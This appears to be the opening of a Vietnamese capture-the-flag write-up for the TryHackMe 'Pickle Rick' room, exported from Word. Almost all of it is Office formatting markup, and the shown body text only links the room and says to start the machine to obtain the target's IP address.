<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="46" Name="List Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="List Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="List Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Mention"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Smart Hyperlink"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Hashtag"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Unresolved Mention"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Smart Link"/>
</w:LatentStyles>
</xml><![endif]-->
<style>
<!--
/* Font Definitions */
@font-face
{font-family:Wingdings;
panose-1:5 0 0 0 0 0 0 0 0 0;
mso-font-charset:2;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:0 268435456 0 0 -2147483648 0;}
@font-face
{font-family:"Cambria Math";
panose-1:2 4 5 3 5 4 6 3 2 4;
mso-font-charset:0;
mso-generic-font-family:roman;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 1 0;}
@font-face
{font-family:Calibri;
panose-1:2 15 5 2 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:swiss;
mso-font-pitch:variable;
mso-font-signature:-469750017 -1073732485 9 0 511 0;}
@font-face
{font-family:"Calibri Light";
panose-1:2 15 3 2 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:swiss;
mso-font-pitch:variable;
mso-font-signature:-469750017 -1073732485 9 0 511 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{mso-style-unhide:no;
mso-style-qformat:yes;
mso-style-parent:"";
margin-top:0in;
margin-right:0in;
margin-bottom:8.0pt;
margin-left:0in;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri",sans-serif;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:Calibri;
mso-fareast-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;}
p.MsoHeader, li.MsoHeader, div.MsoHeader
{mso-style-priority:99;
mso-style-link:"Header Char";
margin:0in;
mso-pagination:widow-orphan;
tab-stops:center 3.25in right 6.5in;
font-size:11.0pt;
font-family:"Calibri",sans-serif;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:Calibri;
mso-fareast-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;}
p.MsoFooter, li.MsoFooter, div.MsoFooter
{mso-style-priority:99;
mso-style-link:"Footer Char";
margin:0in;
mso-pagination:widow-orphan;
tab-stops:center 3.25in right 6.5in;
font-size:11.0pt;
font-family:"Calibri",sans-serif;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:Calibri;
mso-fareast-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;}
a:link, span.MsoHyperlink
{mso-style-priority:99;
color:#0563C1;
mso-themecolor:hyperlink;
text-decoration:underline;
text-underline:single;}
a:visited, span.MsoHyperlinkFollowed
{mso-style-noshow:yes;
mso-style-priority:99;
color:#954F72;
mso-themecolor:followedhyperlink;
text-decoration:underline;
text-underline:single;}
p.MsoListParagraph, li.MsoListParagraph, div.MsoListParagraph
{mso-style-priority:34;
mso-style-unhide:no;
mso-style-qformat:yes;
margin-top:0in;
margin-right:0in;
margin-bottom:8.0pt;
margin-left:.5in;
mso-add-space:auto;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri",sans-serif;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:Calibri;
mso-fareast-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;}
p.MsoListParagraphCxSpFirst, li.MsoListParagraphCxSpFirst, div.MsoListParagraphCxSpFirst
{mso-style-priority:34;
mso-style-unhide:no;
mso-style-qformat:yes;
mso-style-type:export-only;
margin-top:0in;
margin-right:0in;
margin-bottom:0in;
margin-left:.5in;
mso-add-space:auto;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri",sans-serif;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:Calibri;
mso-fareast-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;}
p.MsoListParagraphCxSpMiddle, li.MsoListParagraphCxSpMiddle, div.MsoListParagraphCxSpMiddle
{mso-style-priority:34;
mso-style-unhide:no;
mso-style-qformat:yes;
mso-style-type:export-only;
margin-top:0in;
margin-right:0in;
margin-bottom:0in;
margin-left:.5in;
mso-add-space:auto;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri",sans-serif;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:Calibri;
mso-fareast-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;}
p.MsoListParagraphCxSpLast, li.MsoListParagraphCxSpLast, div.MsoListParagraphCxSpLast
{mso-style-priority:34;
mso-style-unhide:no;
mso-style-qformat:yes;
mso-style-type:export-only;
margin-top:0in;
margin-right:0in;
margin-bottom:8.0pt;
margin-left:.5in;
mso-add-space:auto;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri",sans-serif;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:Calibri;
mso-fareast-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;}
span.HeaderChar
{mso-style-name:"Header Char";
mso-style-priority:99;
mso-style-unhide:no;
mso-style-locked:yes;
mso-style-link:Header;}
span.FooterChar
{mso-style-name:"Footer Char";
mso-style-priority:99;
mso-style-unhide:no;
mso-style-locked:yes;
mso-style-link:Footer;}
.MsoChpDefault
{mso-style-type:export-only;
mso-default-props:yes;
font-family:"Calibri",sans-serif;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:Calibri;
mso-fareast-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;}
.MsoPapDefault
{mso-style-type:export-only;
margin-bottom:8.0pt;
line-height:107%;}
/* Page Definitions */
@page
{mso-footnote-separator:url("Khai%20thác%20Pickle%20Rick%20_files/header.htm") fs;
mso-footnote-continuation-separator:url("Khai%20thác%20Pickle%20Rick%20_files/header.htm") fcs;
mso-endnote-separator:url("Khai%20thác%20Pickle%20Rick%20_files/header.htm") es;
mso-endnote-continuation-separator:url("Khai%20thác%20Pickle%20Rick%20_files/header.htm") ecs;}
@page WordSection1
{size:8.5in 11.0in;
margin:1.0in 1.0in 1.0in 1.0in;
mso-header-margin:.5in;
mso-footer-margin:.5in;
mso-footer:url("Khai%20thác%20Pickle%20Rick%20_files/header.htm") f1;
mso-paper-source:0;}
div.WordSection1
{page:WordSection1;}
/* List Definitions */
@list l0
{mso-list-id:413629757;
mso-list-type:hybrid;
mso-list-template-ids:-1566689646 407122604 67698691 67698693 67698689 67698691 67698693 67698689 67698691 67698693;}
@list l0:level1
{mso-level-start-at:0;
mso-level-number-format:bullet;
mso-level-text:\F0F0;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;
mso-fareast-font-family:Calibri;
mso-fareast-theme-font:minor-latin;
mso-bidi-font-family:"Calibri Light";
mso-bidi-theme-font:major-latin;}
@list l0:level2
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l0:level3
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l0:level4
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l0:level5
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l0:level6
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l0:level7
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l0:level8
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l0:level9
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l1
{mso-list-id:415251017;
mso-list-type:hybrid;
mso-list-template-ids:-1658662980 21688932 67698691 67698693 67698689 67698691 67698693 67698689 67698691 67698693;}
@list l1:level1
{mso-level-start-at:0;
mso-level-number-format:bullet;
mso-level-text:-;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:2.25in;
text-indent:-.25in;
font-family:"Calibri Light",sans-serif;
mso-fareast-font-family:Calibri;
mso-fareast-theme-font:minor-latin;}
@list l1:level2
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:2.75in;
text-indent:-.25in;
font-family:"Courier New";}
@list l1:level3
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:3.25in;
text-indent:-.25in;
font-family:Wingdings;}
@list l1:level4
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:3.75in;
text-indent:-.25in;
font-family:Symbol;}
@list l1:level5
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:4.25in;
text-indent:-.25in;
font-family:"Courier New";}
@list l1:level6
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:4.75in;
text-indent:-.25in;
font-family:Wingdings;}
@list l1:level7
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:5.25in;
text-indent:-.25in;
font-family:Symbol;}
@list l1:level8
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:5.75in;
text-indent:-.25in;
font-family:"Courier New";}
@list l1:level9
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:6.25in;
text-indent:-.25in;
font-family:Wingdings;}
@list l2
{mso-list-id:952202420;
mso-list-type:hybrid;
mso-list-template-ids:-487539466 67698689 67698691 67698693 67698689 67698691 67698693 67698689 67698691 67698693;}
@list l2:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l2:level2
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l2:level3
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l2:level4
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l2:level5
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l2:level6
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l2:level7
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l2:level8
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l2:level9
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l3
{mso-list-id:979185759;
mso-list-type:hybrid;
mso-list-template-ids:-317560336 67698689 67698691 67698693 67698689 67698691 67698693 67698689 67698691 67698693;}
@list l3:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l3:level2
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l3:level3
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l3:level4
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l3:level5
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l3:level6
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l3:level7
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l3:level8
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l3:level9
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l4
{mso-list-id:1210923306;
mso-list-type:hybrid;
mso-list-template-ids:1619276620 67698689 67698691 67698693 67698689 67698691 67698693 67698689 67698691 67698693;}
@list l4:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l4:level2
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l4:level3
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l4:level4
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l4:level5
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l4:level6
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l4:level7
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l4:level8
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l4:level9
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l5
{mso-list-id:1432119546;
mso-list-type:hybrid;
mso-list-template-ids:268365904 67698689 67698691 67698693 67698689 67698691 67698693 67698689 67698691 67698693;}
@list l5:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l5:level2
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l5:level3
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l5:level4
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l5:level5
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l5:level6
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l5:level7
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l5:level8
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l5:level9
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l6
{mso-list-id:1511290503;
mso-list-type:hybrid;
mso-list-template-ids:-724898288 67698689 -1 -1 -1 -1 -1 -1 -1 -1;}
@list l6:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l6:level2
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l6:level3
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l6:level4
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l6:level5
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l6:level6
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l6:level7
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l6:level8
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l6:level9
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l7
{mso-list-id:2030527857;
mso-list-type:hybrid;
mso-list-template-ids:-121980200 67698689 67698691 67698693 67698689 67698691 67698693 67698689 67698691 67698693;}
@list l7:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l7:level2
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l7:level3
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l7:level4
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l7:level5
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l7:level6
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l7:level7
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l7:level8
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";}
@list l7:level9
{mso-level-number-format:bullet;
mso-level-text:\F0A7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
ol
{margin-bottom:0in;}
ul
{margin-bottom:0in;}
-->
</style>
<!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:8.0pt;
mso-para-margin-left:0in;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri",sans-serif;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;}
</style>
<![endif]--><!--[if gte mso 9]><xml>
<o:shapedefaults v:ext="edit" spidmax="1027"/>
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1"/>
</o:shapelayout></xml><![endif]-->
</head>
<body lang=EN-US link="#0563C1" vlink="#954F72" style='tab-interval:.5in;
word-wrap:break-word'>
<div class=WordSection1>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Server
khai thác:<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><a
href="https://tryhackme.com/room/picklerick"><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>https://tryhackme.com/room/picklerick</span></a><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin'><o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Th&#7921;c
hi&#7879;n start machine &#273;&#7875; l&#7845;y &#273;&#7883;a ch&#7881; ip c&#7911;a
m&#7909;c tiêu c&#7847;n khai thác:<o:p></o:p></span></p>
